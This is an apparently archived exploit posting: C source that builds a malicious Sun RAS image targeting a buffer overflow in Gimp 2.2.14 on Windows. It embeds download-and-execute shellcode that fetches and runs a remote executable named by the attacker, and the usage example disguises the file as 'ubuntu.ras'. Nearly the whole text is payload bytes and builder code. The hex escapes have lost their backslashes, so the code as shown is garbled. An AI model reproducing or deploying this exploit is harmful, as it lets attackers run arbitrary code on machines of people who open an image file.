gimp2214-overflow.txt

Posted on 10 May 2007

/* :: Kristian Hermansen :: Date: 20070509 Description: Gimp 2.2.14 RAS vuln, thanks to Marsu. This one is universal download and exec using call esp in libgimpcolor-2.0-0.dll. Vulnerable: Gimp 2.2.14 Tested: Gimp 2.2.14 on Windows Vista, XP, 2000 Compile: gcc -o netsniper-gimpu netsniper-gimpu.c Usage: ./netsniper-gimpu http://tinyurl.com/32h99k ubuntu.ras */ #include <stdio.h> #include <stdlib.h> #include <string.h> char RAS[]= "x59xa6x6ax95x00x00x01xfdx00x00x01xb6x00x00x00x08" "x00x03x68x94x00x00x00x00x00x00x00x01x00x00x03x29" "x1bxffxbcxefx73xd9x13x00x70xf0xccx8dx99x50xf1xf7" "xacx4dxf0xabxe0xecxefx2exe5x8cxefxa6x33x8cxc6xfa" "xfex00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x1bxffxd7x64x8bx7cx41x84x00x2dx00xd0x99x94xe9xad" "xb4x4bxc9x85xe9xe5xb4x80x98x8cxe0xc4x33xb6xd5xf7" "x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00xe3x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x19xffxeax2exd2xd9xb6xb4x00x6cxccxe6x99xc5xe6x32" "xb4x51x90x90x24x00x00x00x3ax8cxd3xd9x33xd5xddxf3" "x02x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x7bx00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42xebx10x81x90" "x8bxf8x00x0dxffx42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x00x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x4ex01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x22" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01xd5x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x00x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x35x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "xb3x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x3dx01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x4ax01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x00x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x1fx01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01xddx01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x00x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01xf8x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x05x05x01x01x01x01x01x01" "x01x01x01x10x11x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x0ax11x11" "x11x11x19x0ax01x01x01x01x10x0ex01x01x01x01x01x05" "x08x1fx01x15x11x1cx1cx0ax01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x00x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x08x11x01x01x01x01x01x01x01x01" "x01x10x00x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x19x00x0cx19x08" "x11x00x08xfbx01x01x08x11x01x01x01x01x01x0ax00x1f" "x1fx11x08x0ax19x00x05x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01xcdx01x01x01x01" "x8bx01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x1ax01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x00x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"; unsigned char DownExec[] = "xebx10x5ax4ax33xc9x66xb9x3cx01x80x34x0ax99xe2xfa" "xebx05xe8xebxffxffxffx70x4cx99x99x99xc3xfdx38xa9" "x99x99x99x12xd9x95x12xe9x85x34x12xd9x91x12x41x12" "xeaxa5x12xedx87xe1x9ax6ax12xe7xb9x9ax62x12xd7x8d" "xaax74xcfxcexc8x12xa6x9ax62x12x6bxf3x97xc0x6ax3f" "xedx91xc0xc6x1ax5ex9dxdcx7bx70xc0xc6xc7x12x54x12" "xdfxbdx9ax5ax48x78x9ax58xaax50xffx12x91x12xdfx85" "x9ax5ax58x78x9bx9ax58x12x99x9ax5ax12x63x12x6ex1a" "x5fx97x12x49xf3x9dxc0x71xc9x99x99x99x1ax5fx94xcb" "xcfx66xcex65xc3x12x41xf3x98xc0x71xa4x99x99x99x1a" "x5fx8axcfxdfx19xa7x19xecx63x19xafx19xc7x1ax75xb9" "x12x45xf3xb9xcax66xcex75x5ex9dx9axc5xf8xb7xfcx5e" "xddx9ax9dxe1xfcx99x99xaax59xc9xc9xcaxcfxc9x66xce" "x65x12x45xc9xcax66xcex69xc9x66xcex6dxaax59x35x1c" "x59xecx60xc8xcbxcfxcax66x4bxc3xc0x32x7bx77xaax59" "x5ax71xbfx66x66x66xdexfcxedxc9xebxf6xfaxd8xfdxfd" "xebxfcxeaxeax99xdexfcxedxcaxe0xeaxedxfcxf4xddxf0" "xebxfcxfaxedxf6xebxe0xd8x99xcexf0xf7xdcxe1xfcxfa" "x99xdcxe1xf0xedxcdxf1xebxfcxf8xfdx99xd5xf6xf8xfd" "xd5xf0xfbxebxf8xebxe0xd8x99xecxebxf5xf4xf6xf7x99" "xccxcbxd5xddxf6xeexf7xf5xf6xf8xfdxcdxf6xdfxf0xf5" "xfcxd8x99"; int main(int argc, char *argv[]) { FILE* rasfile; char evilbuff[4000]; if (argc!=3) { printf("Usage: %s <exe_url> <bad.ras> ",argv[0]); return 0; } memcpy(evilbuff,RAS,sizeof(RAS)-1); /* 0x6aec8d3d call esp in libgimpcolor-2.0-0.dll universal */ memset(evilbuff+0x125,0x6a,1); memset(evilbuff+0x33e,0xec,1); memset(evilbuff+0x231,0x8d,1); memset(evilbuff+0x124,0x3d,1); memcpy(evilbuff+0x380,DownExec,sizeof(DownExec)-1); memcpy(evilbuff+0x380+sizeof(DownExec)-1,argv[1],strlen(argv[1])); memset(evilbuff+0x380+sizeof(DownExec)-1+strlen(argv[1]),0x80,1); if ((rasfile=fopen(argv[2],"wb"))==0) { printf("[-] Unable to access file. "); return 0; } fwrite(evilbuff, 1, 4000, rasfile); fclose(rasfile); return 0; }

TOP

Malware :

Last 20

Exploits :

Last 20